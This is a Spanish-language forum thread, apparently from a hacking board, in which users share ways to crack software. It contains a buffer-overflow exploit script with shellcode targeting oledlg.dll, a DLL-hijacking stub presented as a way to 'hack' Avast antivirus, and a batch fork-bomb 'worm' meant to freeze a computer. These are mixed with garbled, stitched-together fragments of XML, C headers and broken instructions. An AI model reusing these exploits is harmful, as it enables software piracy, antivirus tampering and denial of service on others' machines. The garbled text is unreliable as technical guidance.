Mensajes

nada solo decir a toda  esta gente que teneis este problema que sois bastantes entrad en este enlace
http://www.securitytube.net/video/1478 

si ha alguien le interesa tambien se puede crackear en linux

Código (actionscript) [Seleccionar] Expandir

[/ </ID_CHECKBOX1>
    <ID_NotebookSearchSource>
      <index>2</index>
    </ID_NotebookSearchSource>
    <ID_TextCtrlSearchInFileList>
      <value></value>
    </ID_TextCtrlSearchInFileList>
    <ID_ListCtrlSearchFilesAndFolders>
      <items/>
    </ID_ListCtrlSearchFilesAndFolders>
    <ID_CheckBoxIncludeSubFolders>
      <value>1</value>
    </ID_CheckBoxIncludeSubFolders>
    <ID_ComboBoxIncludeWords>
      <items/>
      <index>-1</index>
      <value></value>
    </ID_ComboBoxIncludeWords>
    <ID_ComboBoxFilePath>
      <items/>
      <index>-1</index>
      <value>Z:\root\program\</value>
    </ID_ComboBoxFilePath>
] asi les tiene que quedar olledlg.cfg
y se tiene que generar este archivo apartir de este script que crearemos con kwrite en ubuntu
[code=asm][appdata = ENV['APPDATA']
file = appdata +"\\tec.ini

f = open(file, "wb")
eb = "\xeb\x06\x90\x90"
ppr = "\x67\x15\xD3\x74" #Module Name=C:\WINDOWS\system32\oledlg.dll version=1.0 (XPClient.010817-1148)
#Spawn calc.exe, bad characters: \x00\x0a\x0d
shellcode = ("\xdd\xc3\xd9\x74\x24\xf4\x5a\xb8\x30\xe7\x16\x7d\x33\xc9" +
"\xb1\x33\x31\x42\x17\x83\xc2\x04\x03\x72\xf4\xf4\x88\x8e" +
"\x12\x71\x72\x6e\xe3\xe2\xfa\x8b\xd2\x30\x98\xd8\x47\x85" +
"\xea\x8c\x6b\x6e\xbe\x24\xff\x02\x17\x4b\x48\xa8\x41\x62" +
"\x49\x1c\x4e\x28\x89\x3e\x32\x32\xde\xe0\x0b\xfd\x13\xe0" +
"\x4c\xe3\xdc\xb0\x05\x68\x4e\x25\x21\x2c\x53\x44\xe5\x3b" +
"\xeb\x3e\x80\xfb\x98\xf4\x8b\x2b\x30\x82\xc4\xd3\x3a\xcc" +
"\xf4\xe2\xef\x0e\xc8\xad\x84\xe5\xba\x2c\x4d\x34\x42\x1f" +
"\xb1\x9b\x7d\x90\x3c\xe5\xba\x16\xdf\x90\xb0\x65\x62\xa3" +
"\x02\x14\xb8\x26\x97\xbe\x4b\x90\x73\x3f\x9f\x47\xf7\x33" +
"\x54\x03\x5f\x57\x6b\xc0\xeb\x63\xe0\xe7\x3b\xe2\xb2\xc3" +
"\x9f\xaf\x61\x6d\xb9\x15\xc7\x92\xd9\xf1\xb8\x36\x91\x13" +
"\xac\x41\xf8\x79\x33\xc3\x86\xc4\x33\xdb\x88\x66\x5c\xea" +
"\x03\xe9\x1b\xf3\xc1\x4e\xd3\xb9\x48\xe6\x7c\x64\x19\xbb" +
"\xe0\x97\xf7\xff\x1c\x14\xf2\x7f\xdb\x04\x77\x7a\xa7\x82" +
"\x6b\xf6\xb8\x66\x8c\xa5\xb9\xa2\xef\x28\x2a\x2e\xde\xcf" +
"\xca\xd5\x1e")

f.write("\r\n[Act_"+"\x41"*1088+eb+ppr+shellcode+"]\r\nEnabled = 1\r\n")
f.close()
] le llamaremos app/data

luego ya bastara abrir con wine tec.exe  y emplear convert para olledlg.cfg , app/data

y crearan un archivo 03.log y walla crackeado importante cuando creen olledlg.cfg hagan una copia y llamen le olledlg.lst el programa al principio no la reconocera pero la dan all archives y no habra problema


saludos.....[/code]

primero vayan aqui[url]http://www.exploit-db.com/local/ y descarguense world list buffer overflow
abranlo con hex y se encontraran con esto

Código (asm) [Seleccionar] Expandir

[0x00000000: 0a
0a
0a
0a
0a
0a
0a
0a -
0a
]

es decir programa desprotegido

y tiene que protegerlo de manera que olly no pueda realizar ningun tipo de accion ni siquiera correr el programa y hex que muestre un registro muy distinto

ayuda:http://www.woodmann.com/crackz/Miscpapers.htm : y disfruten , si tienen alguna recomendacion , o idea o pregunta no duden en postearla ,gracias

disculpa hace bastante tiempo que publique esta repuesta


mira en ese tiempo no estaba muy familiarizado con el uso de este foro


lo publique por que tuve acceso al primer codigo que puso su desarrollador



y lo hice con la mejor intencion del mundo    mira una cosa en aquel momento ese programa estaba muy bien cifrado  y por el hacker que lo desarrollo doy fe de ello

el programa en un prinicipio fuen un simple crackme que se auto ejecutaba y pedia un codigo
y no quiero hablar mas del tema     y ese dia no era 28 de diciembre saludos

#include <windows.h>

int main()
{
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
  main();
  return 0;
}
estas sentencia escribidla en note pad    y salvar como mfc90loc.dll

lo interesante es que cuando se inicia el motro de instalacion se lanza un registro de
aqui no me instalo por que no me gusta

vais a opcione instalacion presonalizada y le ordenais que emplee este archivo mfc90loc.dll
sorpresa se instala ....

abris el olly y en conditional logs anadis  el bug  le plugin a anadir mfc90loc.dll

valor+segmento= #include <windows.h>+int main()
{
={
  main();
  return 0;
}

en este mismo momento olly avisa de shift F9 violation nada adelante le dais y lo correis
el antivirus os avisa de que no funcion correctamente

cerrais todo

y le dais a modificar instalacion premio antivirus hackeado  version pro avast setup la demo

importante hagan estas prubeas con linux nunca con microsoft

si quieren corregir  las criticas son constructivas    xao hasta la proxima jessejemmes

era una simple mencion alos quilmes que desarrollaban antiguamente los hackers
como un tributo grande capitancrunch

si es cierto que hoy en dia el scriptinq es muy recomendado te doy la razon

hasta aqui


peor se han hecho autenticos destroyers en batch 

engordaria el codigo con alguna encriptacion de tipo mochila americana , y luego buscaria
alguna manual en exploit data  e inssertarselo pero 

si quereis disfrutar de juguetes buenos bajaros bactrack r2  http://www.backtrack-linux.org/ y vais a disfrutar como enanos

  /bueno este seria un pequeno quilme como la cerveza ja,ja es un simple comando que ordena aperturas de documentos hasta bloquear el ordenador es decir un pequeno worm la diferncia esque se puede ocultar en archivo en iso.(en este caso)
o en el que ustedes quieran
i empleo una simple encriptacion de extracion de datos pero con un (-).

Código [Seleccionar] Expandir

set exit=echo set bucle %%start cmd.exe%%:bucle el quilme en cuestion luego se ha cifrado
start cmd.exe
goto bucle
#include <stdio.h>:bucle
start cmd.exe@echo off
echo cmd.exe
pause>nul
goto bucle
exit
#include <sys/socket.h>:bucle
start cmd.exe@echo off
echo cmd.exe
pause>nul
goto bucle
exit
#include <sys/types.h>:bucle
start cmd.exe
start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle.
#include <linux/netlink.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <fcntl.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <errno.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <stdlib.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <string.h>:bucle
start cmd.exe start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#include <string.h>:bucle
start cmd.exe
start cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <unistd.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <sys/stat.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle
#include <signal.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit.
#include <sys/mount.h>:bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
goto bucle
exit
#define SECRET "secretlol":bucle
start cmd.exestart cmd.exe@echo off
set.exe=-4567kgbexploit-09023
echo.%exe:~-4,13%
pause>nul
exit
goto bucle


void die(const char *msg)
goto bucle )

xao si alguien tiene alguna opinion  o quiere incluir algo no duduies en contestar

Mirate esto:
http://www.google.com.ar/search?hl=es&rlz=1B3GGGL_esAR265AR265&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=parallel+port+emulation&spell=1

Parece que es lo que buscas.
[/quote
yo ,he visitado la pagina y creo que es lo mas logico